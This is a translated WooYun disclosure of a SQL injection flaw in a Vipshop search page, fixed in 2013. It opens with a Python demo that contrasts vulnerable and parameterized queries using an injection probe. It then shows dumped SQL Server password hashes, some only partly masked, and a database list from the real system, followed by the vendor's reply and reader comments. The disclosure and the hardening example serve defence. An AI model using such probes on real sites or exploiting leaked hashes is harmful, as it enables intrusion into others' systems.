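The defect the report describes, a request field (txtName, filtered by the app key) spliced into SQL text, is shown below next to its hardened form. This is an added illustration, not code from the report or from Vipshop's application: the table, column names and sample rows are constructed, an in-memory SQLite database stands in for the SQL Server backend, and the query shape is an assumption about what the search handler does. The probe string only demonstrates that the two versions differ; the parameterized version also escapes LIKE wildcards, a detail that binding alone does not cover.

```python
import sqlite3

# Constructed sample data standing in for the component table that the
# search page presumably queries (the real schema is not known).
SAMPLE_ROWS = [
    ("S1 Calendar", "APP00007"),
    ("S2 Todo", "APP00007"),
    ("S3 Notice", "APP00008"),
]


def make_db() -> sqlite3.Connection:
    """In-memory SQLite database used in place of the SQL Server backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE components (name TEXT, app_key TEXT)")
    conn.executemany("INSERT INTO components VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def search_vulnerable(conn: sqlite3.Connection, txt_name: str, app_key: str) -> list:
    """Assumed shape of the original defect: request fields concatenated into SQL text.

    Anything in txt_name that closes the quoted literal becomes part of the
    query, so the app_key filter (and every other condition) can be bypassed.
    """
    sql = ("SELECT name FROM components WHERE app_key = '" + app_key
           + "' AND name LIKE '%" + txt_name + "%'")
    return [row[0] for row in conn.execute(sql)]


def escape_like(value: str) -> str:
    """Neutralise LIKE metacharacters so the pattern matches the input literally."""
    return value.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")


def search_safe(conn: sqlite3.Connection, txt_name: str, app_key: str) -> list:
    """Hardened form: values travel as bind parameters, never as SQL text.

    Binding stops injection; escape_like() additionally stops user-supplied
    % and _ from acting as wildcards, which binding alone does not prevent.
    """
    sql = "SELECT name FROM components WHERE app_key = ? AND name LIKE ? ESCAPE '\\'"
    pattern = "%" + escape_like(txt_name) + "%"
    return [row[0] for row in conn.execute(sql, (app_key, pattern))]


def demo() -> dict:
    """Run the same inputs through both handlers and return the result sets."""
    conn = make_db()
    probe = "x%' OR 1=1 --"  # constructed probe: closes the quoted literal
    return {
        "normal_vulnerable": search_vulnerable(conn, "S2", "APP00007"),
        "normal_safe": search_safe(conn, "S2", "APP00007"),
        "probe_vulnerable": search_vulnerable(conn, probe, "APP00007"),
        "probe_safe": search_safe(conn, probe, "APP00007"),
        "wildcard_safe": search_safe(conn, "S_", "APP00007"),
    }


if __name__ == "__main__":
    for label, rows in demo().items():
        print(f"{label}: {rows}")
```

For the ordinary input "S2" both handlers return the same single row. For the probe, the concatenating handler returns every row, including the one belonging to a different app key, because the injected condition makes the WHERE clause true for all of them; the parameterized handler treats the probe as an ordinary search string and returns nothing. The last entry shows that "S_" is searched literally once wildcards are escaped, instead of matching every name beginning with "S".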

Proof of vulnerability:

database management system users password hashes:
[*] ##MS_PolicyEventProcessingLogin## [1]:
password hash: 0x0100c1939c2fc85b*******4e3ef65249d96027ea2407a5a
header: 0x0100
salt: c1939c2f
mixedcase: c85b857c74f3f834e3******96027ea2407a5a
[*] ##MS_PolicyTsqlExecutionLogin## [1]:
password hash: 0x010000b0718c4339aa59e3ca38f72de2eaf38dca88a57168a27a
header: 0x0100
salt: 00b0718c
mixedcase: 4339aa59e3ca38f72de2eaf38dca88a57168a27a
[*] admin [1]:
password hash: 0x010027bea6b7b5be9******b2d5bb671e80f47164364e561
header: 0x0100
salt: 27bea6b7
mixedcase: b5be9bd85ffd9abb******80f47164364e561
[*] macro [1]:
password hash: 0x0100132fbf05748d25******5fc2027e8fab85695210eda856
header: 0x0100
salt: 132fbf05
mixedcase: 748d253944dbd45fc2******85695210eda856
[*] OPEC [1]:
password hash: 0x01003da2cb2d309******e83b853dc18c0498c85dd1792c02b
header: 0x0100
salt: 3da2cb2d
mixedcase: 309185312f4e83b******498c85dd1792c02b
[*] sa [1]:
password hash: 0x01009c4ee991996******dea6d05454cace638a8709043eb
header: 0x0100
salt: 9c4ee991
mixedcase: 99647bf55c710dea******ce638a8709043eb


available databases [20]:
[*] DB_MessageCenter
[*] Doc**ench
[*] ES**
[*] Informatio**rtal
[*] KM2S**
[*] LogSe**rDB
[*] master
[*] model
[*] msdb
[*] OPE**EC
[*] OPE**SO
[*] Open**atform
[*] ReportServer
[*] ReportServerTempDB
[*] SND**ROCESS
[*] SND**ROCESS_DATA
[*] SN**eeting
[*] tempdb
[*] W**
[*] X**arch

Fix recommendation:

There are all sorts of systems here; take offline whatever should be taken offline.

Copyright notice: when reposting, please credit loli@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 15

Confirmed: 2013-11-05 22:38

Vendor reply:

Thank you for submitting the vulnerability.

Latest status:

2013-11-12: The vulnerability has been fixed. Many thanks to the white hats for their support and prodding; we have prepared some small gifts for the white hats who support and help us. Please follow our Weibo: http://weibo.com/VSRC



Comments

  1. 2013-12-10 16:22 | 默之 ( regular white hat | Rank:334 vulns:67 | Settling. )

    Hi, how did you find this POST injection point? I looked up some articles online, but they all seem pretty messy...

  2. 2013-12-10 16:23 | 默之 ( regular white hat | Rank:334 vulns:67 | Settling. )

    "Injection point", I mean; excuse the typo.

  3. 2013-12-10 16:33 | loli certified white hat ( regular white hat | Rank:550 vulns:52 )

    @默之 Capture the packets.

  4. 2013-12-10 16:59 | 默之 ( regular white hat | Rank:334 vulns:67 | Settling. )

    @loli Could you be a bit more specific? How do you find the POST injection point? Thanks.

  5. 2014-04-18 15:19 | evil_webshell ( passer-by | Rank:0 vulns:2 | Focused on web-layer security, love hacking techniques, currently... )

    Learned something; keep it up.

  6. 2014-10-11 18:50 | 乐乐、 ( regular white hat | Rank:853 vulns:189 )

    Whoa! How did you dig up this address - -